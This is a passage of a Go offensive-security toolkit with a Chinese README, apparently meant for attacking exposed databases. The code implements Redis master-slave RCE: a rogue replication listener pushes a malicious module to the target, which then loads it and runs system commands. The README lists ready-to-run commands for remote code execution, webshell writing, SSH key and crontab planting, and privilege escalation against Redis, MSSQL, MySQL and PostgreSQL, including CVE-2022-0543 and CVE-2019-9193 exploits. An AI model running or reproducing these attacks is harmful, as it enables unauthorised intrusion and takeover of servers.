 6 | 	"github.com/axgle/mahonia"
 7 | 	"io"
 8 | 	"os"
 9 | 	"strings"
10 | )
11 | 
12 | var (
13 | 	payload []byte
14 | )
15 | 
16 | // RunCmd system.exec 执行命令
17 | func RunCmd(cmd string) {
18 | 	ctx := context.Background()
19 | 	val, err := Rdb.Do(ctx, "system.exec", cmd).Result()
20 | 	if err != nil {
21 | 		Err(err)
22 | 		return
23 | 	}
24 | 	fmt.Println(mahonia.NewDecoder("gbk").ConvertString(val.(string)))
25 | 
26 | }
27 | 
28 | // RedisSlave 开启主从复制
29 | func RedisSlave() {
30 | 	// 打开 exp
31 | 	f, err := os.Open(dll)
32 | 	if err != nil {
33 | 		Err(err)
34 | 	}
35 | 
36 | 	payload, err = io.ReadAll(f)
37 | 	if err != nil {
38 | 		Err(err)
39 | 	}
40 | 
41 | 	Info("保存数据")
42 | 	Success(RedisCmd("save"))
43 | 
44 | 	Info("导出数据 out.json")
45 | 	handle_export()
46 | 
47 | 	Info("开启主从复制")
48 | 	slave := fmt.Sprintf("slaveof %v 21001", Lhost)
49 | 	Info(slave)
50 | 	Success(RedisCmd(slave))
51 | 
52 | 	dir := fmt.Sprintf("config set dir %v", redisDir)
53 | 	Info(dir)
54 | 	Success(RedisCmd(dir))
55 | 
56 | 	file := fmt.Sprintf("config set dbfilename %v", dll)
57 | 	Info(file)
58 | 	Success(RedisCmd(file))
59 | 
60 | 	Listen()
61 | 
62 | 	load := fmt.Sprintf("module load ./%v", dll)
63 | 	Info(load)
64 | 	Success(RedisCmd(load))
65 | 
66 | }
67 | 
68 | // CloseSlave 关闭主从复制
69 | func CloseSlave(s string) {
70 | 	Info("尝试关闭主从")
71 | 
72 | 	Info("slaveof no one")
73 | 	Success(RedisCmd("slaveof no one"))
74 | 
75 | 	// 执行命令才卸载 module
76 | 	if strings.Contains(s, "exec") {
77 | 		// 如果不是 exp.dll 就删除
78 | 		if !strings.Contains(dll, ".dll") {
79 | 			RunCmd("rm " + dll)
80 | 		}
81 | 
82 | 		Info("module unload system")
83 | 		Success(RedisCmd("module unload system"))
84 | 	}
85 | 
86 | 	dir := fmt.Sprintf("config set dir %v", redisDir)
87 | 	Info(dir)
88 | 	Success(RedisCmd(dir))
89 | 
90 | 	db := fmt.Sprintf("config set dbfilename %v", redisDbFilename)
91 | 	Info(db)
92 | 	Success(RedisCmd(db))
93 | 
94 | 	Info("导入数据 out.json")
95 | 	handle_import()
96 | }
97 | 


--------------------------------------------------------------------------------
/pac/redis_string.go:
--------------------------------------------------------------------------------
 1 | package pac
 2 | 
 3 | import (
 4 | 	"bufio"
 5 | 	"fmt"
 6 | 	"io"
 7 | 	"io/ioutil"
 8 | 	"os"
 9 | 	"regexp"
10 | 	"strings"
11 | )
12 | 
13 | var (
14 | 	data []string
15 | )
16 | 
17 | // 读取文件
18 | func readFile(file string) {
19 | 	f, err := os.Open(file)
20 | 	if err != nil {
21 | 		Err(err)
22 | 		os.Exit(0)
23 | 	}
24 | 	defer f.Close()
25 | 
26 | 	r := bufio.NewReader(f)
27 | 	for {
28 | 		var i string
29 | 		line, err := r.ReadString('\n')
30 | 		i = strings.Replace(line, "\r\n", "", -1)
31 | 		if err == io.EOF {
32 | 			data = append(data, i)
33 | 			return
34 | 		}
35 | 		if err != nil {
36 | 			fmt.Println(err)
37 | 		}
38 | 		data = append(data, i)
39 | 	}
40 | }
41 | 
42 | func readExp(path string) []byte {
43 | 	shell, err := ioutil.ReadFile(path)
44 | 	if err != nil {
45 | 		Err(err)
46 | 	}
47 | 	return shell
48 | }
49 | 
50 | // 正则匹配
51 | func ReString(info interface{}, s string) string {
52 | 	reg := regexp.MustCompile(s)
53 | 	list := reg.FindAllStringSubmatch(info.(string), -1)
54 | 	return list[0][0]
55 | }
56 | 
57 | // Redis 字符串
58 | func redisString(i interface{}) string {
59 | 	switch v := i.(type) {
60 | 	case []interface{}:
61 | 		s := ""
62 | 		for _, i := range v {
63 | 			s += i.(string) + " "
64 | 		}
65 | 		return s
66 | 	}
67 | 	return ""
68 | 
69 | }
70 | 


--------------------------------------------------------------------------------
/pac/redis_tcp.go:
--------------------------------------------------------------------------------
 1 | package pac
 2 | 
 3 | import (
 4 | 	"fmt"
 5 | 	"io"
 6 | 	"net"
 7 | 	"strings"
 8 | 	"sync"
 9 | )
10 | 
11 | // Listen 开启TCP端口
12 | func Listen() {
13 | 	Info("开启TCP服务")
14 | 	addr := fmt.Sprintf("0.0.0.0:21001")
15 | 	Info(addr)
16 | 
17 | 	var wg sync.WaitGroup
18 | 	wg.Add(1)
19 | 
20 | 	tcpAddr, err := net.ResolveTCPAddr("tcp", addr)
21 | 	if err != nil {
22 | 		Err(err)
23 | 	}
24 | 
25 | 	tcpListen, err := net.ListenTCP("tcp", tcpAddr)
26 | 	if err != nil {
27 | 		Err(err)
28 | 	}
29 | 
30 | 	defer tcpListen.Close()
31 | 
32 | 	c, err := tcpListen.AcceptTCP()
33 | 	if err != nil {
34 | 		Err(err)
35 | 	}
36 | 	Info(c.RemoteAddr().String())
37 | 
38 | 	go sendCmd(&wg, c)
39 | 	wg.Wait()
40 | 
41 | 	c.Close()
42 | 
43 | }
44 | 
45 | // 读取dll进行主从
46 | func sendCmd(wg *sync.WaitGroup, c *net.TCPConn) {
47 | 
48 | 	defer wg.Done()
49 | 
50 | 	buf := make([]byte, 1024)
51 | 	for {
52 | 		n, err := c.Read(buf)
53 | 		if err == io.EOF {
54 | 			return
55 | 		}
56 | 
57 | 		if err != nil {
58 | 			return
59 | 		}
60 | 
61 | 		switch {
62 | 		case strings.Contains(string(buf[:n]), "PING"):
63 | 			c.Write([]byte("+PONG\r\n"))
64 | 
65 | 		case strings.Contains(string(buf[:n]), "REPLCONF"):
66 | 			c.Write([]byte("+OK\r\n"))
67 | 
68 | 		case strings.Contains(string(buf[:n]), "SYNC"):
69 | 			resp := "+FULLRESYNC " + "0000000000000000000000000000000000000000" + " 1" + "\r\n"
70 | 			resp += "$" + fmt.Sprintf("%v", len(payload)) + "\r\n"
71 | 			respb := []byte(resp)
72 | 			respb = append(respb, payload...)
73 | 			respb = append(respb, []byte("\r\n")...)
74 | 			c.Write(respb)
75 | 		}
76 | 	}
77 | }
78 | 


--------------------------------------------------------------------------------
/pac/ssh_connect.go:
--------------------------------------------------------------------------------
  1 | package pac
  2 | 
  3 | import (
  4 | 	"fmt"
  5 | 	"golang.org/x/crypto/ssh"
  6 | 	"golang.org/x/crypto/ssh/terminal"
  7 | 	"io/ioutil"
  8 | 	"log"
  9 | 	"net"
 10 | 	"os"
 11 | 	"time"
 12 | )
 13 | 
 14 | func publicKeyAuthFunc(kPath string) ssh.AuthMethod {
 15 | 	key, err := ioutil.ReadFile(kPath)
 16 | 	if err != nil {
 17 | 		log.Fatal("ssh key file read failed", err)
 18 | 	}
 19 | 	// Create the Signer for this private key.
 20 | 	signer, err := ssh.ParsePrivateKey(key)
 21 | 	if err != nil {
 22 | 		log.Fatal("ssh key signer failed", err)
 23 | 	}
 24 | 	return ssh.PublicKeys(signer)
 25 | }
 26 | 
 27 | func SSHConnect(Ruser string, Rhost string, PWD string) {
 28 | 	//可以使用 password 或者 sshkey 2种方式来认证。
 29 | 	sshHost := Rhost      // 主机名
 30 | 	sshUser := Ruser      //用户名
 31 | 	sshPassword := PWD    //密码
 32 | 	sshType := "password" //ssh认证类型
 33 | 	sshKeyPath := ""      //ssh id_rsa.id路径
 34 | 	sshPort := 22
 35 | 
 36 | 	//创建ssh登陆配置
 37 | 	config := &ssh.ClientConfig{
 38 | 		Timeout: time.Second, //ssh 连接timeout时间一秒钟，如果ssh验证错误 会在1秒内返回
 39 | 		User:    sshUser,     //指定ssh连接用户
 40 | 		//HostKeyCallback: ssh.InsecureIgnoreHostKey(), //这个可以，但是不够安全
 41 | 		HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error {
 42 | 			return nil
 43 | 		},
 44 | 	}
 45 | 
 46 | 	if sshType == "password" {
 47 | 		config.Auth = []ssh.AuthMethod{ssh.Password(sshPassword)}
 48 | 	} else {
 49 | 		config.Auth = []ssh.AuthMethod{publicKeyAuthFunc(sshKeyPath)}
 50 | 	}
 51 | 
 52 | 	//dial获取ssh Client
 53 | 	addr := fmt.Sprintf("%s:%d", sshHost, sshPort)
 54 | 	sshClient, err := ssh.Dial("tcp", addr, config)
 55 | 	if err != nil {
 56 | 		log.Fatal("创建ssh client 失败", err)
 57 | 	}
 58 | 	defer sshClient.Close()
 59 | 
 60 | 	//创建ssh-session
 61 | 	session, err := sshClient.NewSession()
 62 | 	if err != nil {
 63 | 		log.Fatal("创建ssh session 失败", err)
 64 | 	}
 65 | 	defer session.Close()
 66 | 	//将当前终端的stdin文件句柄设置给远程给远程终端，这样就可以使用tab键
 67 | 	fd := int(os.Stdin.Fd())
 68 | 	state, err := terminal.MakeRaw(fd)
 69 | 	if err != nil {
 70 | 		panic(err)
 71 | 	}
 72 | 	defer terminal.Restore(fd, state)
 73 | 
 74 | 	session.Stdout = os.Stdout // 会话输出关联到系统标准输出设备
 75 | 	session.Stderr = os.Stderr // 会话错误输出关联到系统标准错误输出设备
 76 | 	session.Stdin = os.Stdin   // 会话输入关联到系统标准输入设备
 77 | 
 78 | 	//设置终端模式
 79 | 	modes := ssh.TerminalModes{
 80 | 		ssh.ECHO:          0,     //禁止回显 （0 禁止,1 启动）
 81 | 		ssh.TTY_OP_ISPEED: 14400, // input speed = 14.4kbaud
 82 | 		ssh.TTY_OP_OSPEED: 14400, //output speed = 14.4kbaud
 83 | 	}
 84 | 
 85 | 	// 请求伪终端
 86 | 	if err = session.RequestPty("linux", 32, 160, modes); err != nil {
 87 | 		log.Fatalf("request pty error: %s", err.Error())
 88 | 	}
 89 | 
 90 | 	//启动远程shell
 91 | 	if err = session.Shell(); err != nil {
 92 | 		log.Fatalf("start shell error: %s", err.Error())
 93 | 	}
 94 | 
 95 | 	//等待远程命令（终端）退出
 96 | 	if err = session.Wait(); err != nil {
 97 | 		log.Fatalf("return error: %s", err.Error())
 98 | 	}
 99 | }
100 | 


--------------------------------------------------------------------------------
/readme.md:
--------------------------------------------------------------------------------
  1 | ## Redis
  2 | ### 连接redis获取sql shell
  3 | ```shell
  4 | go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -cli
  5 | ```
  6 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673162384827-437c4b52-f054-4dac-82fb-2ebd6c5e1db6.png#averageHue=%232d2c2c&clientId=u67188ca8-ad41-4&from=paste&height=227&id=u6a32632c&name=image.png&originHeight=340&originWidth=1748&originalType=binary&ratio=1&rotation=0&showTitle=false&size=61401&status=done&style=none&taskId=u9ce98198-9c8b-40f0-b330-f72a23aee6a&title=&width=1165.3333333333333)
  7 | ### 主从复制RCE
  8 | ```shell
  9 | //Linux
 10 | go run .\main.go -redis  -rhost 192.168.111.211  -lhost 192.168.1.110 -exec -so exp.so
 11 | go run .\main.go -redis  -rhost 192.168.111.211  -lhost 192.168.1.110 -exec -console -so exp.so
 12 | ```
 13 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673168621037-f35fbab0-d512-4091-84d0-69a8bead823c.png#averageHue=%232c2c2c&clientId=u67188ca8-ad41-4&from=paste&height=593&id=uf2330416&name=image.png&originHeight=890&originWidth=1767&originalType=binary&ratio=1&rotation=0&showTitle=false&size=151041&status=done&style=none&taskId=u8e73d49b-85ea-4c1b-994b-c094dcbd9ea&title=&width=1178)
 14 | ### Lua沙盒绕过命令执行(CVE-2022-0543)
 15 | ```shell
 16 | go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -lua -console
 17 | ```
 18 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673169147330-646d29f4-b9f5-43f7-bec9-f455d204ee99.png#averageHue=%232c2c2c&clientId=u67188ca8-ad41-4&from=paste&height=263&id=ubf42c5a7&name=image.png&originHeight=395&originWidth=1540&originalType=binary&ratio=1&rotation=0&showTitle=false&size=56558&status=done&style=none&taskId=u3c8fa367-3e93-498a-9223-fc0b4576281&title=&width=1026.6666666666667)
 19 | ### 写公钥
 20 | 将ssh.txt文件中公钥替换成自己生成的
 21 | ```shell
 22 | go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -sshkey
 23 | ```
 24 | ### 写Webshell
 25 | ```shell
 26 | go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -shell
 27 | ```
 28 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673172455308-4d7d1f2b-25ec-4ff2-9002-37a951006a64.png#averageHue=%232c2c2c&clientId=u4db9b2af-90c3-4&from=paste&height=637&id=ue060e558&name=image.png&originHeight=956&originWidth=1678&originalType=binary&ratio=1&rotation=0&showTitle=false&size=151014&status=done&style=none&taskId=u9d4fbe22-3293-4f4c-9d0c-3c53c03d080&title=&width=1118.6666666666667)
 29 | ### 定时任务
 30 | 需要修改crontab.txt内容
 31 | ```shell
 32 | go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -crontab
 33 | ```
 34 | ## MSSQL
 35 | ### 连接数据库并获取一个sql shell
 36 | ```shell
 37 | go run .\main.go -mssql -rhost 192.168.111.223 -rport 1433 -ruser sa -pwd "1qaz@WSX"  -cli
 38 | ```
 39 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1675177766048-6b3b73c8-78d4-4e09-b9ff-de880da2d1d4.png#averageHue=%232d2d2c&clientId=uf3dc0733-6a37-4&from=paste&height=357&id=u24708bb9&name=image.png&originHeight=536&originWidth=1769&originalType=binary&ratio=1&rotation=0&showTitle=false&size=112663&status=done&style=none&taskId=u50b40e50-727f-42ee-91e5-c0979786901&title=&width=1179.3333333333333)
 40 | ### 开启xp_cmdshell
 41 | ```shell
 42 | go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -isxp
 43 | ```
 44 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673028201084-80b53f0e-8e02-4263-8f06-f24776514701.png#averageHue=%232e2d2c&clientId=u08da9ee0-8226-4&from=paste&height=307&id=udc10c4d2&name=image.png&originHeight=461&originWidth=1819&originalType=binary&ratio=1&rotation=0&showTitle=false&size=106608&status=done&style=none&taskId=u8199fc07-72ea-4c05-b76f-92c07ea77f2&title=&width=1212.6666666666667)
 45 | ### xp_cmdshell获取一个执行系统命令的shell
 46 | ```shell
 47 | go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -isxp -console
 48 | ```
 49 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673028316198-6dc5a19d-4c93-4d62-aef4-80f027530067.png#averageHue=%232d2d2c&clientId=u08da9ee0-8226-4&from=paste&height=276&id=ucb4936fc&name=image.png&originHeight=414&originWidth=1591&originalType=binary&ratio=1&rotation=0&showTitle=false&size=89465&status=done&style=none&taskId=ud51186ff-df6b-4166-9347-f5c0c4d2e1c&title=&width=1060.6666666666667)
 50 | ### xp_cmdshell执行单条系统命令
 51 | ```shell
 52 | go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX"  -isxp -docmd -cmd "whoami"
 53 | ```
 54 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673028373704-771c27d7-1c70-4359-818f-f5ee934c03fc.png#averageHue=%232d2d2c&clientId=u08da9ee0-8226-4&from=paste&height=259&id=uf0957005&name=image.png&originHeight=389&originWidth=1786&originalType=binary&ratio=1&rotation=0&showTitle=false&size=86227&status=done&style=none&taskId=u164f0020-29d3-40a2-a39a-b1dae0192d2&title=&width=1190.6666666666667)
 55 | ### 开启sp_oacreate
 56 | ```shell
 57 | go run main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -issp
 58 | ```
 59 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673028504490-a80fce4f-dec8-45ed-bf1d-cb8ddada1bf9.png#averageHue=%232e2d2c&clientId=u08da9ee0-8226-4&from=paste&height=264&id=u43df7f3c&name=image.png&originHeight=396&originWidth=1918&originalType=binary&ratio=1&rotation=0&showTitle=false&size=103785&status=done&style=none&taskId=u5cc1b732-ac3e-4e06-b1a9-21d318445ea&title=&width=1278.6666666666667)
 60 | ### sp_oacreate获取一个执行系统命令的shell
 61 | ```shell
 62 | go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -issp -console
 63 | ```
 64 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673028597527-1f4a86ad-f2e3-474f-bc14-1b72d99b2509.png#averageHue=%232d2c2c&clientId=u08da9ee0-8226-4&from=paste&height=471&id=ub3f49863&name=image.png&originHeight=707&originWidth=2232&originalType=binary&ratio=1&rotation=0&showTitle=false&size=159682&status=done&style=none&taskId=uf13f8f08-71a6-4091-8f2a-cde092c92f1&title=&width=1488)
 65 | ### sp_oacreate执行单条系统命令
 66 | ```shell
 67 | go run main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX"  -issp -docmd -cmd "whoami"
 68 | ```
 69 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673028782184-2beee226-5d8a-449f-aac8-f92ffba184d7.png#averageHue=%232d2c2c&clientId=u08da9ee0-8226-4&from=paste&height=421&id=u56eedfb9&name=image.png&originHeight=632&originWidth=2319&originalType=binary&ratio=1&rotation=0&showTitle=false&size=146388&status=done&style=none&taskId=u408d7e26-3620-47ab-82de-2c641f0c855&title=&width=1546)
 70 | ### CLR获取一个执行系统命令的shell
 71 | ```shell
 72 | go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -isclr -console
 73 | ```
 74 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673029296087-5b97dcab-b004-4e78-9477-7ae2d9079867.png#averageHue=%232d2d2c&clientId=u08da9ee0-8226-4&from=paste&height=438&id=u9b24b4c0&name=image.png&originHeight=657&originWidth=1832&originalType=binary&ratio=1&rotation=0&showTitle=false&size=142685&status=done&style=none&taskId=ua7222524-b6ac-44d8-833d-b9ce6134d74&title=&width=1221.3333333333333)
 75 | ### CLR执行单条系统命令
 76 | ```shell
 77 | go run main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX"  -isclr -docmd -cmd "whoami"
 78 | ```
 79 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673029487512-084efe55-dff3-46fd-a2bd-ee4c15bc0408.png#averageHue=%232d2d2c&clientId=u08da9ee0-8226-4&from=paste&height=395&id=u28f01cec&name=image.png&originHeight=592&originWidth=1827&originalType=binary&ratio=1&rotation=0&showTitle=false&size=137314&status=done&style=none&taskId=u1fe330da-bef3-433f-b6e6-058b30d7f7e&title=&width=1218)
 80 | ### log备份写getshell
 81 | ```shell
 82 | go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -shell -logshell -path "C:\phpStudy\WWW\aa.php" -e 'php'
 83 | ```
 84 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673029630310-7157f5fd-a6d1-4180-a2ab-82365975599a.png#averageHue=%232d2c2c&clientId=u08da9ee0-8226-4&from=paste&height=376&id=u99c99882&name=image.png&originHeight=564&originWidth=2156&originalType=binary&ratio=1&rotation=0&showTitle=false&size=138324&status=done&style=none&taskId=u57002ca6-f2e2-4fe4-927b-55b6f1e8c54&title=&width=1437.3333333333333)
 85 | ### 差异备份getshell
 86 | 
 87 | ```shell
 88 | go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -difshell -path "C:\phpStudy\WWW\shell.php" -e 'php'
 89 | ```
 90 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673029787485-9fd603ad-2644-4d3e-85ca-0995f620b4eb.png#averageHue=%232d2c2c&clientId=u08da9ee0-8226-4&from=paste&height=335&id=u548fd650&name=image.png&originHeight=502&originWidth=2102&originalType=binary&ratio=1&rotation=0&showTitle=false&size=121883&status=done&style=none&taskId=udec3fc47-ddfc-4d5b-9628-8e351de57c0&title=&width=1401.3333333333333)
 91 | ## SSH连接
 92 | ```shell
 93 | go run .\main.go -ssh -ruser root -rhost 192.168.111.139 -pwd "1qaz@WSX"
 94 | ```
 95 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673030022732-c37f6580-12e8-4262-861e-936263fdf94d.png#averageHue=%232c2c2b&clientId=u08da9ee0-8226-4&from=paste&height=463&id=ua7a42f48&name=image.png&originHeight=694&originWidth=1811&originalType=binary&ratio=1&rotation=0&showTitle=false&size=103526&status=done&style=none&taskId=uada5ae58-8e86-44dd-af4f-6e631ae5dfe&title=&width=1207.3333333333333)
 96 | ## Mysql
 97 | ### 连接获取sql shell
 98 | ```shell
 99 | go run .\main.go -mysql -ruser root -rhost 192.168.111.134 -pwd "root" -rport 3306 -cli
100 | ```
101 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673030365697-3c1c72c2-fe1b-43ce-89ac-06feac0548b5.png#averageHue=%232c2b2b&clientId=u08da9ee0-8226-4&from=paste&height=238&id=u7c6e2300&name=image.png&originHeight=357&originWidth=1676&originalType=binary&ratio=1&rotation=0&showTitle=false&size=45044&status=done&style=none&taskId=ub8d468ed-b2e8-4cd8-8c3e-8d2143dcdb7&title=&width=1117.3333333333333)
102 | ### into out file获取webshell
103 | ```shell
104 | go run .\main.go -mysql -ruser root -rhost 192.168.111.136 -pwd "root" -rport 3306 -shell -outfileshell -path "C:\\\\phpStudy\\\\WWW\\\\\aaa.php"
105 | ```
106 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673030645785-1b594344-6002-410a-921d-f8efc3901bb2.png#averageHue=%232d2d2c&clientId=u08da9ee0-8226-4&from=paste&height=293&id=u4f764585&name=image.png&originHeight=439&originWidth=2476&originalType=binary&ratio=1&rotation=0&showTitle=false&size=117107&status=done&style=none&taskId=ub72efd5b-a58d-4cfc-b02a-7408b84a0cb&title=&width=1650.6666666666667)
107 | ### 全局日志getshell
108 | ```shell
109 | go run .\main.go -mysql -ruser root -rhost 192.168.111.136 -pwd "root" -rport 3306 -shell -generallog -path C:\\\\phpStudy\\\\WWW\\\\aam.php
110 | ```
111 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673030756036-47074c66-a11d-4019-adfc-4ac3727659b5.png#averageHue=%232c2c2b&clientId=u08da9ee0-8226-4&from=paste&height=269&id=udb7af4ba&name=image.png&originHeight=403&originWidth=2296&originalType=binary&ratio=1&rotation=0&showTitle=false&size=87296&status=done&style=none&taskId=uaf8c1a39-31a0-49f4-8524-40873034fec&title=&width=1530.6666666666667)
112 | ### udf提权
113 | ```shell
114 | go run .\main.go -mysql -ruser root -rhost 192.168.111.136 -pwd "root" -rport 3306 -udf
115 | ```
116 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673031307685-e3ce68e6-73f8-40eb-9297-51ab60415098.png#averageHue=%232d2c2c&clientId=u08da9ee0-8226-4&from=paste&height=512&id=uc2bcd055&name=image.png&originHeight=768&originWidth=1732&originalType=binary&ratio=1&rotation=0&showTitle=false&size=155085&status=done&style=none&taskId=ud0b58534-3ee7-4879-82e5-205a25f2ff1&title=&width=1154.6666666666667)
117 | ## postgresql
118 | ### 连接postgre数据库获取sql shell
119 | ```shell
120 | go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.162 -rport "5432" -cli
121 | ```
122 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673160848120-fd598941-e7a8-456f-bb5b-c41bdeaecc93.png#averageHue=%232d2d2c&clientId=u67188ca8-ad41-4&from=paste&height=307&id=u56542eca&name=image.png&originHeight=460&originWidth=2071&originalType=binary&ratio=1&rotation=0&showTitle=false&size=107639&status=done&style=none&taskId=u881db7a3-6cf0-4448-924e-ed59a618da9&title=&width=1380.6666666666667)
123 | ### 利用CVE-2019-9193循环执行命令
124 | ```shell
125 | go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -CVE20199193 -console
126 | ```
127 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673160917125-06586a4d-3256-42e9-9956-db1e36ca7b8d.png#averageHue=%232d2d2c&clientId=u67188ca8-ad41-4&from=paste&height=336&id=uf546e084&name=image.png&originHeight=504&originWidth=2019&originalType=binary&ratio=1&rotation=0&showTitle=false&size=126344&status=done&style=none&taskId=u9e7e6f41-650e-432e-839c-6612b81b65c&title=&width=1346)
128 | ### 利用CVE-2019-9193执行单条命令
129 | ```shell
130 | go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -CVE20199193 -cmd "pwd"
131 | ```
132 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673161033085-4ab426eb-558c-47b9-a5d0-a4b29098b69e.png#averageHue=%232d2d2c&clientId=u67188ca8-ad41-4&from=paste&height=265&id=uced0c31e&name=image.png&originHeight=398&originWidth=2105&originalType=binary&ratio=1&rotation=0&showTitle=false&size=109865&status=done&style=none&taskId=u86817218-9b22-4ac6-a084-8bc69b2a101&title=&width=1403.3333333333333)
133 | ### 单次文件读取(方法一)
134 | ```shell
135 | go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -read1 -file "/etc/passwd"
136 | ```
137 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673161149239-1f78ce81-d03d-42ec-8d0e-0bd4649ecd62.png#averageHue=%232d2c2c&clientId=u67188ca8-ad41-4&from=paste&height=680&id=u8e990df0&name=image.png&originHeight=1020&originWidth=2190&originalType=binary&ratio=1&rotation=0&showTitle=false&size=210671&status=done&style=none&taskId=u63e87976-5a9f-439c-adb3-5414fc68dbf&title=&width=1460)
138 | ### 循环文件读取(方法一)
139 | ```shell
140 | go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -read1 -console
141 | ```
142 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673161239356-65b45cb0-3f97-44f4-83e6-dc937a835dff.png#averageHue=%232d2c2c&clientId=u67188ca8-ad41-4&from=paste&height=719&id=u195ced09&name=image.png&originHeight=1078&originWidth=2235&originalType=binary&ratio=1&rotation=0&showTitle=false&size=226870&status=done&style=none&taskId=u866bcede-0111-422c-85d7-ae027662f44&title=&width=1490)
143 | ### 单次文件读取(方法二)
144 | ```shell
145 | go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -read2 -file "/etc/passwd"
146 | ```
147 | 把hex值转换string即为结果
148 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673161361614-52b060b2-f9cb-4344-ab9b-15fef9b73d87.png#averageHue=%23302f2e&clientId=u67188ca8-ad41-4&from=paste&height=568&id=ud5083910&name=image.png&originHeight=852&originWidth=2492&originalType=binary&ratio=1&rotation=0&showTitle=false&size=222519&status=done&style=none&taskId=ua2ef94f7-6c84-430f-900f-bd6915af25d&title=&width=1661.3333333333333)
149 | ### 循环文件读取(方法二)
150 | ```shell
151 | go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -read2 -console
152 | ```
153 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673161442923-657ff922-0990-4071-84ad-0a1e3cab1409.png#averageHue=%23302f2e&clientId=u67188ca8-ad41-4&from=paste&height=598&id=uccac852c&name=image.png&originHeight=897&originWidth=2474&originalType=binary&ratio=1&rotation=0&showTitle=false&size=230880&status=done&style=none&taskId=u236bbaee-3851-40d5-ae81-aa2c5d75e03&title=&width=1649.3333333333333)
154 | ### 列目录
155 | ```shell
156 | go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -list -file "./"
157 | ```
158 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673161496940-22009d1c-0290-4448-8cdf-ae6b161753d6.png#averageHue=%232c2b2b&clientId=u67188ca8-ad41-4&from=paste&height=661&id=u894f9629&name=image.png&originHeight=991&originWidth=2314&originalType=binary&ratio=1&rotation=0&showTitle=false&size=134912&status=done&style=none&taskId=u2101e801-9ce2-46f9-9eac-8eb0ca8d57d&title=&width=1542.6666666666667)
159 | ### 循环列目录
160 | ```shell
161 | go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -list -console
162 | ```
163 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673161555557-09ef072c-6942-4851-9d13-98c41f0551e1.png#averageHue=%232c2b2b&clientId=u67188ca8-ad41-4&from=paste&height=747&id=u3fe96a4b&name=image.png&originHeight=1121&originWidth=2302&originalType=binary&ratio=1&rotation=0&showTitle=false&size=151516&status=done&style=none&taskId=udee2f48a-0781-4199-8b99-3ef9c866556&title=&width=1534.6666666666667)
164 | ### 上传webshell
165 | ```shell
166 | go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -write -uploadpath "/tmp/shell.jsp" -e "jsp"
167 | ```
168 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673161636103-34acc8f7-e097-4452-8e7c-4de12bbc4d70.png#averageHue=%232e2d2c&clientId=u67188ca8-ad41-4&from=paste&height=222&id=uaa70f9de&name=image.png&originHeight=333&originWidth=2230&originalType=binary&ratio=1&rotation=0&showTitle=false&size=95815&status=done&style=none&taskId=u71252157-f05e-4b2b-9209-e57a8af5b27&title=&width=1486.6666666666667)
169 | ## Oracle
